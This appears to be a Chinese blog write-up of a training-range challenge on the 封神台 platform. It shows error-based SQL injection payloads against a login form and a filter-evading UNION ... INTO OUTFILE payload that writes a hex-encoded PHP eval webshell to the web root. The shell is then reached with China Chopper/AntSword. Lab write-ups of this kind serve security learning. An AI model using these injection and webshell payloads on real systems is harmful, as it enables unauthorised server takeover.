封神台-尤里的复仇II 回归sql-注入绕过防护getshell
http://cntj8003.ia.aqlab.cn/bees/admin/login.phpz
直接在给出的靶场链接后面加上admin回车,跳转到后台登录页面,没有做目录扫描
1、在用户名处加上'测试,发现报错,存在注入漏洞
2、尝试报错注入
将用户名改为:admin' or extractvalue(1,concat(0x7e,database())) #
爆数据库安装路径admin' or extractvalue(1,concat(0x7e,@@basedir)) #
phpstudy,哈哈,盲猜网站的web路径为D:/phpStudy/ WWW
找个写入SQL写入一句话木马的payload
admin'+un+union+ion+seselectlect+1,2,3,4,0x3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E++in+into+ououtfiletfile+'D:/phpStudy/www/ttt1.php'--+
其中0x为16进制编码的开头,3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E为<?php @eval($_POST['123']);?>的16进制编码,其他内容请参考其他博主的博客~~
访问http://cntj8003.ia.aqlab.cn/ttt1.php
上菜刀蚁剑进行连接
end。
其实后台密码,我上来就admin+admin登录了,靶场的弱口令习惯了哈哈,但是没有进后台去上传的方式来getshell,哈哈。
封神台-尤里的复仇II 回归sql-注入绕过防护getshell相关推荐
- 尤里的复仇II 回归【7题】
尤里的复仇II 回归[7题] 渗透第一步-信息收集 1 渗透第一步-信息收集 2 基础环境搭建 sqlmap尝鲜题 sql-注入绕过防护getshell awd攻防靶场-fuzz乱拳打死老师傅 归来- ...
- 尤里的复仇II 回归
尤里的复仇II 归来 sqlmap尝鲜题 sql-注入绕过防护getshell sqlmap尝鲜题 Tips: 在修练的过程中,尤里发现在这个领域有很多的神器,只要获得这些神器,就可以让测试更加轻松- ...
- 封神台-尤里的复仇Ⅰ
靶场链接:https://hack.zkaq.cn/ 文章目录 前言 四.为了更多的权限!留言板! 五.进击!拿到Web最高权限! 总结 前言 本来打算把尤里的复仇都做了,做到六就卡住了,不想做了,以 ...
- 掌控靶场 尤里复仇回归sql-注入绕过防护getshell
作为小白做这个靶场时候,按照靶场的要求是要对waf进行绕过的,这次提供的不是绕过的思路,而是另外一个通过弱口令进入到后台之后,找到靶场存在的文件包含漏洞/文件越权访问(也不知道是不是这个漏洞有知道的大 ...
- 封神台----尤里的复仇I-第一章:为了女神小芳
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数.报显示位 ?id=1 order by 2 ------查询了两列 ?i ...
- 封神台----尤里的复仇I-第四章:为了更多的权限!留言板!!
本章主要是xss平台使用,很简单. 自己搭建xss平台或者网上随便找个平台注册使用. 新建个项目,建好后,将下面代码复制到留言板里. 提交,即可.去XSS平台接收消息. 提交,完成.
- 封神台 -尤里的复仇Ⅰ write up 夜车星繁的博客
无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用.因为有了点基础在此写下payload只保证自己可以看得懂. 第一章:为了女神小芳! ?id=1 and ...
- 黑客常用SQL注入绕过技术总结!
今天给大家再次分享一篇硬核内容,那就是黑客常用的SQL注入绕过技术,还是那句话:我们学渗透技术不是为了攻击别人的系统,而是了解黑客常用的渗透技能,以此来修复我们自己系统中的漏洞,使我们的系统更加健壮, ...
- SQL注入绕过(passby)策略
SQL注入绕过技巧 空格绕过 注释符/* */,%a0,%0a 括号绕过空格 select(user())from dual where(1=1)and(2=2) 引号绕过 采用16进制编码绕过,例如 ...
最新文章
- cart2pol函数
- 由浅到浅入门批量渲染(一)
- [转]用Whois获得电信运营商的IP地址是如何分配的?
- BugkuCTF-WEB题秋名山车
- jps命令 Java Virtual Machine Process Status Tool
- cpu占用高 mongo_排查MongoDB CPU使用率高的问题
- Layui 数据表格开启合计行
- 《编码的奥秘》读书笔记
- 下载和安装R、RStudio !~~~
- 电子购物网站导航制作
- Dfinity(ICP)介绍-1
- 智能数据中心和智慧园区:华为的单点突破与全局效应
- 使用python、java语言批量下载抖音中我的视频、我喜欢的视频,解析抖音视频,批量下载抖音...
- ASUS 論壇,有官方槍手,想要刪除抗議 Windows 7 的帖子,並合理化,並罵消費者白目
- 1156 Sexy Primes (20 point(s)) PAT 素数
- Notepad++实用插件整理(Json Viewer、Compare、Explorer、AnalysePlugin)
- c语言 结构体 ppt,第8章C语言的结构体和共同体.ppt
- Pinterest先辈Wists的创业故事
- 一条语句完成微信、支付宝支付,生成支付二维码
- 港科报道 | 香港科技大学(广州)人工智能产学研合作交流会成功举办
热门文章
- 西安拟制定羊肉泡馍肉夹馍制作标准
- 世上万事,不过是一懒二拖三不读书
- 使用安卓(华为)手机通过USB共享网络至Mac (M1pro)
- 计算机显卡性价比推荐,哪个型号显卡性价比最高?显卡性价比天梯图告诉你答案...
- 100个高频Spring面试题,助你一臂之力
- SH7218T拆解手记(12)IWNN(日文输入)的移植
- 硬汉内贾德:让美国人战栗(推荐)
- 收好了,这些max工作效率的学习资源,赶紧用起来
- pathlib.Path模块下的glob、rglob,glob模块下的glob、iglob
- springboot入门到入坟